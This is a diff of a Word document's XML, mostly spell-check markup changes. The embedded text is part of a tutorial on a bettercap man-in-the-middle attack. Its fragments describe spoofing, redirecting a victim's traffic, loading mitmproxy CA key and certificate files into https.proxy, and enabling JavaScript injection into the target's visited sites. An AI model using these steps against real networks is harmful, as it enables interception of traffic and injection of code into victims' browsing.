+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> attack allows us to modify the traffic being sent to the victim. This is where the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>bettercap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>http.proxy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> module comes in play. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8704,13 +9675,43 @@
         </w:rPr>
         <w:t xml:space="preserve">The </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
-          <w:color w:val="000000"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">bettercap http.proxy </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>bettercap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>http.proxy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8736,13 +9737,23 @@
         </w:rPr>
         <w:t xml:space="preserve"> into the target’s visited websites. </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
-          <w:color w:val="000000"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Bettercap takes care of the spoofing and the firewall rules needed in order to redirect the victim’s traffic to the proxy itself.</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Bettercap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> takes care of the spoofing and the firewall rules needed in order to redirect the victim’s traffic to the proxy itself.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8817,8 +9828,28 @@
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Load the key and the certificate to bettercap’s </w:t>
-      </w:r>
+        <w:t xml:space="preserve">Load the key and the certificate to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>bettercap’s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="HTMLCode"/>
@@ -8828,16 +9859,10 @@
           <w:szCs w:val="24"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>https.proxy module</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
-          <w:color w:val="000000"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>. Then, load the script injector to </w:t>
-      </w:r>
+        <w:t>https.proxy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="HTMLCode"/>
@@ -8847,8 +9872,31 @@
           <w:szCs w:val="24"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t xml:space="preserve"> module</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>. Then, load the script injector to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:t>https.proxy</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
@@ -8887,7 +9935,27 @@
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Assuming we already have a MITM attack going on, here are the commands used for the https.proxy module:</w:t>
+        <w:t xml:space="preserve">Assuming we already have a MITM attack going on, here are the commands used for the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>https.proxy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> module:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9034,7 +10102,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>0.16</w:t>
+        <w:t>0.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="006666"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>16</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9054,6 +10132,7 @@
         </w:rPr>
         <w:t>»</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9079,7 +10158,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> https</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>https</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9115,7 +10204,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">injectjs </w:t>
+        <w:t>injectjs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9322,7 +10421,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>0.16</w:t>
+        <w:t>0.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="006666"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>16</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9342,6 +10451,7 @@
         </w:rPr>
         <w:t>»</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9367,7 +10477,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> https</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>https</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9403,7 +10523,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">script </w:t>
+        <w:t>script</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9585,6 +10715,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9630,6 +10761,7 @@
         </w:rPr>
         <w:t>»</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9655,7 +10787,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> https</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>https</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9691,7 +10833,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">key </w:t>
+        <w:t>key</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9720,6 +10872,7 @@
         </w:rPr>
         <w:t>/.</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9729,6 +10882,7 @@
         </w:rPr>
         <w:t>mitmproxy</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9738,6 +10892,7 @@
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9783,6 +10938,7 @@
         </w:rPr>
         <w:t>pem</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9916,7 +11072,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>0.16</w:t>
+        <w:t>0.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="006666"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>16</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9936,6 +11102,7 @@
         </w:rPr>
         <w:t>»</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -9961,7 +11128,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> https</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>https</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9997,7 +11174,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">certificate </w:t>
+        <w:t>certificate</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10026,6 +11213,7 @@
         </w:rPr>
         <w:t>/.</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -10035,6 +11223,7 @@
         </w:rPr>
         <w:t>mitmproxy</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -10044,6 +11233,7 @@
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -10053,6 +11243,7 @@
         </w:rPr>
         <w:t>mitmproxy</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -10080,6 +11271,7 @@
         </w:rPr>
         <w:t>-</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -10107,6 +11299,7 @@
         </w:rPr>
         <w:t>pem</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10240,7 +11433,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>0.16</w:t>
+        <w:t>0.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="006666"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>16</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10260,14 +11463,25 @@
         </w:rPr>
         <w:t>»</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> https</w:t>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>https</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10285,7 +11499,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>proxy on</w:t>
+        <w:t>proxy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10420,7 +11644,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>0.16</w:t>
+        <w:t>0.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="006666"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>16</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10440,6 +11674,7 @@
         </w:rPr>
         <w:t>»</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -10609,7 +11844,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> https</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>https</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10627,7 +11872,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">proxy loading proxy certification authority TLS key </w:t>
+        <w:t>proxy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> loading proxy certification authority TLS key </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10674,6 +11929,7 @@
         </w:rPr>
         <w:t>/.</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -10683,6 +11939,7 @@
         </w:rPr>
         <w:t>mitmproxy</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -10692,6 +11949,7 @@
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -10737,6 +11995,7 @@
         </w:rPr>
         <w:t>pem</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10870,7 +12129,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>0.16</w:t>
+        <w:t>0.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="006666"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>16</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10890,6 +12159,7 @@
         </w:rPr>
         <w:t>»</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11059,7 +12329,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> https</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>https</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11077,7 +12357,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">proxy loading proxy certification authority TLS certificate </w:t>
+        <w:t>proxy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> loading proxy certification authority TLS certificate </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11124,6 +12414,7 @@
         </w:rPr>
         <w:t>/.</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11133,6 +12424,7 @@
         </w:rPr>
         <w:t>mitmproxy</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11142,6 +12434,7 @@
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11151,6 +12444,7 @@
         </w:rPr>
         <w:t>mitmproxy</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11178,6 +12472,7 @@
         </w:rPr>
         <w:t>-</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11205,6 +12500,7 @@
         </w:rPr>
         <w:t>pem</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11313,6 +12609,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11358,6 +12655,7 @@
         </w:rPr>
         <w:t>»</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11664,6 +12962,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -11709,6 +13008,7 @@
         </w:rPr>
         <w:t>»</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -12058,25 +13358,290 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
+        <w:t>0.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="006666"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>16</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
